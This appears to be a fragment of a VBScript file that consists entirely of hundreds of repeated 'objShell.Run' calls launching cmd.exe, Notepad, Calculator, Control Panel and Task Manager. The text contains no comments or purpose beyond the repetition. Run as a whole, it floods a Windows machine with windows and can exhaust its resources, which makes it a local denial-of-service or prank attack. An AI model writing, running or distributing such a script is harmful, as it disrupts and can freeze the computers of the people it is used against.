objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
